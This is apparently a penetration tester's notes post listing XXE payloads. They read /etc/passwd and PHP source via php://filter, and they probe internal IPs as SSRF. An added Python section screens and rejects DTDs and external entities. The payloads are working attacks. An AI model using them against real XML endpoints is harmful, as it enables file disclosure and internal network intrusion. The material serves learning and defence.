Updated whenever I get around to it~ mainly a record of the XXE attack methods I have run into.
XXE with echoed output (in-band)
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<user><username>&name;</username><password>1</password></user>
Reading source code with XXE
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
]>
<user><username>&file;</username><password>456</password></user>
Base64-decode the echoed value to recover the source code.
Using XXE against the internal network
Use XXE as an SSRF primitive against the internal network: first read a few files that reveal internal IP addresses: /etc/hosts, /proc/net/arp, /proc/net/fib_trie.
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY name SYSTEM "file:///etc/hosts">
]>
<user><username>&name;</username><password>1</password></user>
Access the discovered IP address over the http protocol:
<?xml version="1.0"?>
<!DOCTYPE dy [
<!ENTITY dy SYSTEM "http://10.159.187.11">
]>
<user><username>&dy;</username><password>123</password></user>
php://filter can also be used to read it; because the fetched content comes back base64-encoded, this gets around problems with the echoed output (for example an HTTP response whose markup would otherwise break the XML).
<?xml version="1.0"?>
<!DOCTYPE dy [
<!ENTITY dy SYSTEM "php://filter/read=convert.base64-encode/resource=http://10.159.187.11">
]>
<user><username>&dy;</username><password>123</password></user>
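For the defensive side of the three payload shapes above, here is an added example (not code from the original post) in Python rather than the PHP the post targets: a pre-parse screen that surfaces DOCTYPE and external-entity declarations with their URI schemes for logging or WAF rules, and an expat-based parser that rejects any DTD and refuses to fetch external entities. The request bodies are constructed to mirror the post's payloads; the field names and IP are taken from the post.

```python
import re
from xml.parsers import expat

# Constructed request bodies modelled on the payload shapes in the post.
BENIGN = '<user><username>alice</username><password>1</password></user>'
FILE_READ = ('<?xml version="1.0"?><!DOCTYPE a [<!ENTITY name SYSTEM "file:///etc/passwd">]>'
             '<user><username>&name;</username><password>1</password></user>')
SSRF = ('<?xml version="1.0"?><!DOCTYPE dy [<!ENTITY dy SYSTEM '
        '"php://filter/read=convert.base64-encode/resource=http://10.159.187.11">]>'
        '<user><username>&dy;</username><password>123</password></user>')

ENTITY_RE = re.compile(r'<!ENTITY\s+(%\s*)?(\S+)\s+(SYSTEM|PUBLIC)\s+"([^"]*)"', re.I)

def screen_request(body):
    """Pre-parse screening for a WAF rule or request log: does the body declare a
    DTD, and which external entities (general or parameter) does it declare?"""
    entities = []
    for param, name, kind, uri in ENTITY_RE.findall(body):
        scheme = uri.split(':', 1)[0].lower() if ':' in uri else 'relative'
        # php://filter/...resource=<scheme>://... wraps a second scheme; surface it too
        inner = re.search(r'resource=([a-z][a-z0-9+.-]*):', uri, re.I)
        entities.append({'name': name, 'parameter': bool(param), 'kind': kind.upper(),
                         'scheme': scheme,
                         'inner_scheme': inner.group(1).lower() if inner else None})
    return {'has_doctype': '<!DOCTYPE' in body.upper(), 'external_entities': entities}

def parse_untrusted(body):
    """Parse request XML into {element: text}. Any DOCTYPE is rejected outright; as
    defence in depth, an external entity reference aborts the parse instead of fetching."""
    parser = expat.ParserCreate()
    fields, open_elements = {}, []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError('DOCTYPE not permitted in request XML')

    def collect_text(data):
        if open_elements:
            fields[open_elements[-1]] = fields.get(open_elements[-1], '') + data

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = lambda ctx, base, sysid, pubid: 0  # 0 = abort parse
    parser.StartElementHandler = lambda name, attrs: open_elements.append(name)
    parser.EndElementHandler = lambda name: open_elements.pop()
    parser.CharacterDataHandler = collect_text
    parser.Parse(body, True)
    return fields
```

Run `screen_request` on the raw body before parsing so the file:// and php:// attempts are logged even when the parser rejects them.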